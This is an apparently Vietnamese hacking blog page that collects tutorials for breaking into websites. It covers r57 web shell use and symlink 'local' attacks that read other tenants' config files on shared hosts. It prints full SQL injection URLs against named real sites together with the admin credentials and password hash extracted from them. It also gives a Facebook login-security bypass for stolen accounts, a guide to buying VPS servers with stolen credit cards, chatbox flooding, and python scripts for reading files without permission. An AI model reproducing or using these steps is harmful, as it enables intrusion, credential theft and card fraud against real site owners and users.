Trang

Up ảnh imgur.com tiện hơn với addon và extension

https://addons.mozilla.org/en-US/fir...mgur-uploader/ cho Firefox
https://chrome.google.com/webstore/d...cooacjdpmbjlao cho Chrome



Upload print screen firefox : Click chuột phải , chọn Imgur , chọn tab "Upload Selective Screenshot" để upload vùng cần print screen, chọn tab "Upload Screenshot" để upload toàn trang

Xem Thêm

 

Sym R00t

Method : sym root


http://www.mediafire.com/?1wlmj5rqb9afgew - sym.tar
- Đầu tiên up sym.tar lên
Sau đó run câu lệnh
tar -xvf sym.tar
- Và cuối cùng là đi đến folder victim:

domain/folder chứa sym/sym/root/home/user/public_html/
Xong ^^!

Xem Thêm

 

Tản mạn về Local (R57)


I. Cơ bản về r57.

1. Các thông tin ta có thể thấy đc qua shell.

- Safe-mode: On => Đây là chức năng bảo mật bật. Cái này chỉ có 2 kiểu là bật (on) và tắt (off) (đương nhiên) và rõ ràng là khi dùng shell thì vớ phải thằng safe-mode off dễ ăn hơn thằng on.

- PHP version: 4.4.6 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: ON Oracle: OFF => Đây là các chức năng của trang web đc bật hay tắt ( nhìn thì tự biết ).

- Disable functions: Đây là các hàm nó cấm ko cho sử dụng. Nếu là NONE thì nó chẳng cấm thằng nào. Còn như ở ví dụ trên nó cấm sử dụng các hàm : ini_alter,system,passthru,shell_exec,leak,listen,c hgrp,apache_setenv,define_syslog_variables,openlog ,syslog,ftp_exec.

- HDD Free : 85.49 GB HDD Total : 4733.08 GB => cái lày có cần nói ko nhỉ ???
- Ở cái hộp ngay bên dưới có quả "uname -a : Linux v8 2.6.18.1-grsec+e+f6b+gr219+opt+c4a+gr2b-grsec #1 SMP Thu Oct 19 12:50:29 PDT 2006 i686 GNU/Linux" => Thằng này nó dùng hệ điều hành GNU/Linux ( Chả hiểu j` nhưng thấy trên mấy trang cho tải hđh linux hay có cái GNU này )

- pwd : /home/.orzo/myebuddy/MY-IDIR.COM ( drwxr-xr-x ) => Mình đang ở trong thư mục /home/.orzo/myebuddy/MY-IDIR.COM. Còn cái drwxr-xr-x là mấy cái quyền của mình ở trong thư mục này đã đc thằng admin nó chmod từ trước ( ko biết đã chính xác chưa ).

- Và còn 1 ô ở ngay dưới rất hoành tá tràng là "Executed command", ở đó bao gồm có 10 cột nhưng chỉ cần chú ý nhất vào 2 cột đó là cột thứ 2 và cột thứ 10.

+ Cột thứ 2 : Nó ghi các quyền của mình có thể làm đc j` với file hoặc thư mục ở cột thứ 10. VD: drwxrwxrwx => chmod 777 hay còn gọi là owner user tức là toàn quyền với file hoặc thư mục đó nhưng gặp đc cái thằng như thế này có lẽ chỉ vài lần trong đời

+ Cột thứ 10 : Nó liệt kê các file và thư mục trong cái thư mục cắm con shell ( ở đây là /home/.orzo/myebuddy/MY-IDIR.COM ) và tất nhiên sẽ thấy luôn cả con shell
2. Làm việc trong r57.

- Run command (ngay dòng đầu tiên) : ô này để đánh các lệnh để chạy shell trong trường hợp này là các lệnh trong linux (cái này thì phải tìm hiểu). Nếu shell nó thông báo là server bật chế độ bảo mật (safe-mode on) thì dòng này sẽ ko có.

- Work directory : Đây là nơi mình đang làm việc (con shell đang ở trong thư mục này). Ở dòng này các bạn chỉ đánh đc tên của các thư mục mà mình muốn vào, còn muốn sem file hay chỉnh sửa file thì phải dùng đến dòng bên dưới. Trong trường hợp này mình đang làm việc trong thư mục và /home/.orzo/myebuddy/MY-IDIR.COM. Nếu bạn muốn vào thư mục daulom thì cần phải đánh /home/.orzo/myebuddy/MY-IDIR.COM/daulom rùi ấn vào Execute.

- File for edit : Nếu bạn muốn sem hoặc sửa 1 file ( mình khoái nhất là sửa file index ) thì sẽ đánh tên file đó vào. Ví dụ bạn muốn sửa file index.html ở trường hợp này bạn cần đánh /home/.orzo/myebuddy/MY-IDIR.COM/index.html rồi ấn vào edit file. Tuyệt đối ko nên nhầm lẫn thằng này với thằng work directory ở bên trên. Cần hiểu rõ rằng thằng này chỉ dung để đọc hoặc sửa file, còn thằng bên trên thì chỉ dung để đi ra hoặc vào 1 thư mục.

- Mấy cái find fủng với upload ở bên dưới thì bạn tự hiểu nhá.
- Đến phần Database:
+ Ô login : Điền dbuser.
+ Password: Điền dbpass.
+ Database: Điền dbname.
Muốn có những thong tin để điền vào mấy cái ông bên dưới này thì phải tự tìm hiểu thôi, mình cũng chẳng biết hướng dẫn thế nào nữa .

II. Local hack.

Hờ, cái này thì cũng đơn giản thôi, ko quá khó như mọi người vẫn tưởng ( theo bác backdoor là kiểu hack dễ nhất ). Cái thể loại local chỉ đơn giản như ở trong win chuyển từ thư mục này sang thư mục khác thôi. Trên server mỗi trang web nằm trong các thư mục khác nhau. Bạn chỉ việc chuyển từ thư mục đang có con shell sang 1 thư mục bên ngoài khác (cái này đọc kĩ phần Work directory nhá) rồi tự nhiên thấy 1 user của 1 trang web nào đó rồi đi vào thư mục đấy rồi vào phần edit, sửa lại cái index rồi ... Thế là xong!

Leech @HuynhHoaTieuTran

[Hacking] Cách dùng shell hacklocal + 1 số lệnh cơ bản


Đầu tiên mình nói qua qua về hack local tức là hack 1 website(host)nào đó có dùng host chạy chung 1 server

Ví dụ a e muốn hack 1 site nào đó a -e fai check xem nó nằm ở server nào,và nhưng web nào có cùng chạy trên server đó...và khai thác các site cùng server đó xem site nào lỗi để mình có thể thực hiện đc ý đồ ở đây là upload đc công cụ hack của mình lên.
Hiện nay mình thấy dùng Shell là thông dụng nhất , Nếu có host cùng sever với bọn nó thì càng tốt ,up con shell lên host của mình để local sang

Dưới đây là 1 số lệnh khi sử dụng shell
Xem tên domain trên cùng 1 host

ls -la /etc/valiases
cd /etc/vdomainaliases;ls -lia

Trường hợp đặc biệt khi không thể xem user nằm cùng host thì ta thêm && vào

cd /etc/vdomainaliases && ls -lia

+ Muốn biết tên user thì xài lệnh này :

cat /etc/passwd/

Hoặc

less /etc/passwd

+ Local sang victim
vd con shell mình là :

/home/abcd/public_html/

thì mình sẽ local sang nhu sau :

dir home/tên usercần local/public_html

+Xem nội dung của file

cat /home/tên user cần local/public_html/index.php

hoặc Ví dụ mình muốn xem config của 1 forum thì dùng
ln -s /home/tên user cần local/public_html/forum/includes/config.php abc.txt <-- abc.txt ở đây là file bạn tạo ra trên host của bạn để xem file của người khác !

Nếu bạn sử dụng không được các lệnh trên tức là server đã disable chức năng đó. Sẽ update thêm

Thêm 1 số lệnh shell trong linux

- pwd: đưa ra ngoài màn hình thư mục đang hoạt động (ví dụ: /etc/ssh).
- cd: thay đổi thư mục (ví dụ: cd .. – ra một cấp thư mục hiện tại; cd vidu – vào thư mục /vidu).
- ls: đưa ra danh sách nội dung thư mục.
- mkdir: tạo thư mục mới (mkdir tên_thumuc).
- touch: tạo file mới (touch ten_file).
- rmdir: bỏ một thư mục (rmdir ten_thumuc).
- cp: copy file hoặc thư mục (cp file_nguồn file_đích).
- mv: di chuyển file hoặc thư mục; cũng được dùng để đặt lại tên file hoặc thư mục (mv vị_trí_cũ vị_trí_mới hoặc mv tên_cũ tên_mới).
- rm: loại bỏ file (rm tên_file).
Để tìm kiếm file, bạn có thể dùng:
- find : dùng cho các tên file.
- grep < tiêu chuẩn tìm kiếm>: để tìm nội dung trong file.
Để xem một file, bạn có thể dùng:
- more : hiển thị file theo từng trang.
- cat < tên file>: hiển thị tất cả file.
----------------------------------------------------------------------

Bài viết dưới đây mình có nhờ 1 số tài liệu của mấy bạn khác, và mình đã bổ sung để hoàn thiện hơn cho các bạn

TUT local dạng cơ bản:

Hôm nay mình mạn phép viết 1 bài, dù mình rất gà, nhưng cũng xin viết tut cho những bạn như mình

Bây giờ, giả sử như ta chưa có shell đúng không, muốn attack 1 site có nhiều cách, nhưng những cách sau newbie tụi mình hay làm:

1) Tìm bug ngay trên victim
2) Nếu victim ko có bug, ta tìm site cùng server local chơi mình đang muốn nói cách 2 trong topic này, giả sử victim của ta ko có bug, làm gì đây?
Mình sẽ whois xem hàng xóm của nó thử coi.

Chắc chắn các bạn sẽ thấy nhiếu site, ta tìm bug trên từng site, sau đó tìm cách up 1 con shell để local, giả sử mình tìm được 1 thằng nào đó có bug, up được shell rồi thì chơi thôi, ví dụ con shell:

http://2dalat.com/b/img/ini.php

Mình bắt đầu với lệnh
cd /etc/valiases && ls -lia
Trường hợp không dùng được lệnh này thì ta có thể dúng trong 2 lệnh (đối vs Cpanel):

cat /etc/passwd
less /etc/passwd
Và đối với Directadmin:

cat /etc/virtual/domainowners
Lệnh này tìm user cùng site của user đó
khi nó hiện ra, ta tìm victim cần local
Giả sử ta có user "yeubz":

Trường hợp 1:

dir /home/yeubz/public_html/
Sau khi ta vào được thư mục, thì ta thấy các thư mục, các file, tệp, dùng lệnh này để đọc, vidụ như :

cat /home/yeubz/public_html/abc/config.php
ở đây nếu file ko bị chmod kĩ, thì ta có thể đọc được info trong đó vd:

<?php
$db_config=array("host"=>"localhost","port"=>"",
"user"=>"demo",
"pass"=>"123456","database"=>"qanh_quanganh");
$common_config=array();
$common_config['product_per_page']="12";
$common_config['member_per_page']="10";
$common_config['guestbook_per_page']="5";
$common_config['support_email']="support@quanganh.com.vn";
$common_config['contact_email']="info@quanganh.com.vn";
$common_config['sales_email']="sales@quanganh.com.vn";
$common_config['axiom_per_member']="10";
$common_config['stories_per_page']="5";
$common_config['page_per_page']="10";
$common_config['diary_per_page']="5";
$common_config['num_free_picture']="10";
$common_config['allow_free_planner']="1";
?>
Khi các bạn có info của data, thì mình connect tới SQL, điền đầy đủ thông tin.

Tới đây thì có rất nhiều hướng giải quyết, nhưng thông dụng nhất vẫn là edit pass của thằng Admin ( thường thì sẽ là md5)

Trường hợp 2:

Nếu không dir, cat gì được thì ta có thể dùng lệnh sau:

ln -s /home/yeubz/public_html/abc/config.php 1.txt
Lúc đó file config của victim sẽ được tạo ra dưới với tên 1.txt . Nếu mở lên mà bị lỗi 403 thì cũng đừng nãn. Ta sẽ tiếp tục:
Save code này thành file.shtml và up lên.

<!--#include virtual="1.txt"-->
Ở chổ 1.txt các bạn có thể thay đổi tên sau cho trùng với cái file bạn tạo ra ở câu lệnh ln -s. Sau đó thì run nó. Nếu nó hiện ra file config thì quá ngon rồi còn nếu không hiện gì thì cũng đừng buồn, thử Ctrl + U xem

Đây chỉ là 2 cách cực kì cơ bản đối với những server "gà mờ". Sau này mình sẽ hướng dẫn nâng cao cho các bạn, đối với newbie thôi nhé, ai pro thì cũng đừng nên ném gạch nha, em chưa muốn xây nhà

Xem Thêm

 

Tut reg domain.vn

Thấy bên kia nó hide cũng cao, nghĩ còn ăn được nên leech cho AE chiến

AE nào ăn được thì để lại tý kinh nguyệt nhá


Phần này ẩn 2 Credit, bạn đang có 2 Credit
http://www.mediafire.com/?kczyrjy8n187b9d

http://www.mediafire.com/?w4opcbgp2p2wams

Xem Thêm

 

TUT VPS linux ccv thực vật

VPS CLOUD JP
Nguyên liệu:CCV Thực vật ,có bl càng tốt
K socks,VN cứ thế táng
Mail:Tùy
Đâm phát là qua luôn
Đăng kí xong có mail verify acc
Xong vào creat vps mới cần nhập CC
Hàng nhật nên dùng Google Chrome dịch cho tiện
Xong thì connect thông qua SSH Client(đoạn này chưa biết làm)
Victim
Phần này ẩn 4 posts, bạn đang có 4 posts

Phần này ẩn 1 Credit, bạn đang có 2 Credit


Demo:
IP:210.152.137.65
chạy ubuntu
Pics:
This image has been resized.Click to view original image

Xem Thêm

 

Hack Site Phim www.123phim.net

Get version
http://www.123phim.net/Song-hung-ky-di-36-36-Song-hung-ki-di-phim-4246 div 0 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11-- -.html
Get table
http://www.123phim.net/Song-hung-ky-di-36-36-Song-hung-ki-di-phim-4246 div 0 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()-- -.html
Tất cả các table
admin,advertise,camnhan,cat_download,category,chan nel,counter,dienvien,download,favbox,mcategory,med ia,members,mobile,mobile_category,mobile_topinweek ,news,news_category,news_setting,nhipsong_links,ph im,phim_choice,poll_db,problems,requirment,rss_fee ds,section,shopping_category,suggest_stream,tag,te rms,user
Get column của admin
http://www.123phim.net/Song-hung-ky-di-36-36-Song-hung-ki-di-phim-4246 div 0 UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11 from information_schema.columns where table_schema=database() and table_name=0x61646d696e-- -.html
Tất cả column của admin
id,uid,pwd,email,admin_email,report_email,feedback _email,support_email,info_email,legal_email
Get user và pass admin
http://www.123phim.net/Song-hung-ky-di-36-36-Song-hung-ki-di-phim-4246 div 0 UNION SELECT 1,group_concat(uid,0x7c,pwd),3,4,5,6,7,8,9,10,11 from admin-- -.html 
Ta được
admin|admin 


Xem Thêm

 

[SQL] Check Phimck.com

Get version


Mã:
http://phimck.com/Phim-Online/'%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(version(),0x7c))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)--%20-.html
Get table: table_user
Mã:
http://phimck.com/Phim-Online/'%20and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7c))+from+information_schema.tables+where+table_schema=database()+limit+12,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)-- -.html
Get column: user_name và user_password của table_user
Mã:
http://phimck.com/Phim-Online/'%20+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7c))+from+information_schema.columns+where+table_name=0x7461626c655f75736572+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--%20-.html
Mã:
http://phimck.com/Phim-Online/'%20+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7c))+from+information_schema.columns+where+table_name=0x7461626c655f75736572+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--%20-.html
Get data user_name và user_password
Mã:
http://phimck.com/Phim-Online/'%20+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(0x7c,user_name,0x7c,user_password,0x7c)+as+char),0x7e))+from+table_user+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+.html
và kết quả đây
admin|51d31cdcc6bc148eed78adf4cda28331

Xem Thêm

 

[TUT] How to Login in Facebook without Getting the Security Question 100% work

You got someone facebook id and password. If you try to login to that account from your your system, it will ask to answer security question. You can bypass this security.

Requirments:
slave IP address

* Go to http://www.ip2location.com
* and enter the IP address.
* It will show the country of slave.
* Now visit:
* http://www.samair.ru/
* Find the proxy IP address based on the slave's Counry.
* Set the proxy IP in mozilla
* Now login to facebook with id you got. you won't get Security
Question now.

Xem Thêm

 

Flood ChangUonDyU Chatbox (Bypass Anti Flood)

Flood này thì nhiều bạn biết rồi, nhưng đó là với server config chatbox:
$config['check_domain_reffer'] = false; // Kiem tra site gui yeu cau
$config['check_chatbox_key'] = false; // Kiem tra tu khoa chat box
 Còn với server config:
$config['check_domain_reffer'] = true; // Kiem tra site gui yeu cau
$config['check_chatbox_key'] = true; // Kiem tra tu khoa chat box
Thì hãy xem clip bên trên và suy nghĩ xem Juno_okyo đã bypass Anti Flood của ChangUonDyU như nào nhé! :D

P/S: chân thành xin lỗi BeYeuGroup vì đã test chatbox mà ko báo trước :D.

Xem Thêm

 

Server Bypass via Symlink - Jumping in server

==================================================


As we all know, symlinking it's on of greates methods for bypassing server security, mean to read files of other site in same shared host.
For getting success with this tutorial are required the following things:
  • Python Installed on Server
  • b374k.php shell
  • And some scripts u will see below.

This idea have start from devilzc0de geeks and let me explain how it work.


here we are in folder
/var/www/
dono and trying to go into /www/
no permissions to go into /www .
before we got tired by trying the commands u must check if if python it's installed with command :
python -h
Now take this python script and name it as
webs.py , It's a little python script who will open a new port on server SimpleHTTPServer ( python ) module. Default port from script it's 13123 .

#!/usr/bin/env python# devilzc0de.org (c) 2012import SimpleHTTPServerimport SocketServerimport osport = 13123if __name__=='__main__': os.chdir('/') Handler = SimpleHTTPServer.SimpleHTTPRequestHandler httpd = SocketServer.TCPServer(("", port), Handler) print("Now open this server on webbrowser at port : " + str(port)) print("example: http://maho.com:" + str(port)) httpd.serve_forever()
http://pastebin.com/PddvszKC

Next u wil need to run the webs.py script by following command
python webs.py

open the site with port 13123
site.com:13123








Let's go with next method of symlink server bypassing , like u see and into before post now i will explain a new trick with an other tool.
http://www.flashcrew.in/2012/05/serv...umping-in.html

-------------------------
Here we will talk about an other tool who use python permission to read other folders/ files in same server.
Tool called xplor.py and here it's the source

#!/usr/bin/env python
# devilzc0de.org (c) 2012
import sys
import os

def copyfile(source, dest, buffer_size=1024*1024):
if not hasattr(source, 'read'):
source = open(source, 'rb')
if not hasattr(dest, 'write'):
dest = open(dest, 'wb')
while 1:
copy_buffer = source.read(buffer_size)
if copy_buffer:
dest.write(copy_buffer)
else:
break
source.close()
dest.close()

if __name__=="__main__":
if not len(sys.argv) == 3 and not len(sys.argv) == 2:
sys.stdout.write('usage : python ' + os.path.basename(sys.argv[0]) + ' [path to dir/file] [path to save file]\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue issue_new_copy\r\n')
sys.exit(1)

target = sys.argv[1].replace("\\","/")
if os.path.isdir(target):
if not target.endswith("/"):
target = target + "/"
dir = os.listdir(target)
for d in dir:
fs = ""
if os.path.isdir(target + d):
fs = "[ DIR ]"
elif os.path.isfile(target + d):
fs = os.path.getsize(target + d)
fs = str(fs)

sys.stdout.write(fs.rjust(12, " ") + " " + d + "\r\n")
elif os.path.isfile(target):
if len(sys.argv) == 3:
copyfile(target, sys.argv[2])
else:
f = open(target, "rb")
try:
byte = f.read(1024)
sys.stdout.write(byte)
sys.stdout.flush()
while byte != "":
byte = f.read(1024)
sys.stdout.write(byte)
sys.stdout.flush()
finally:
f.close()
else:
sys.stdout.write("Can't found file or folder : " + target)
http://pastebin.com/WqmCE2sJ


testing the script
python xplor.py

User the tool to view folders where not have any permission to read inside

python xplor.py /var/www/index.php


View the files in no access folder .
python xplor.py /var/www/index.php


copy/ save ur file
python xplor.py /var/www/indro/ketek.jpg ketek.jpg


And yeah file it's here


Yeahh fucking access it's granted

Some thing u can do with those other scripts in perl
webs.pl
and
xplor.pl

enjoy it :)

Xem Thêm

 

Tut khai khác, up shell, local host windowns

Tut khai khác, up shell, local host windowns dành cho người bắt đầu học hack
trong video có nhiều câu kéo lủng củng, các bác bỏ quá cho tut dành cho newbie, pro tránh xa

http://www.mediafire.com/?uvj4iv00bg0conj

Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương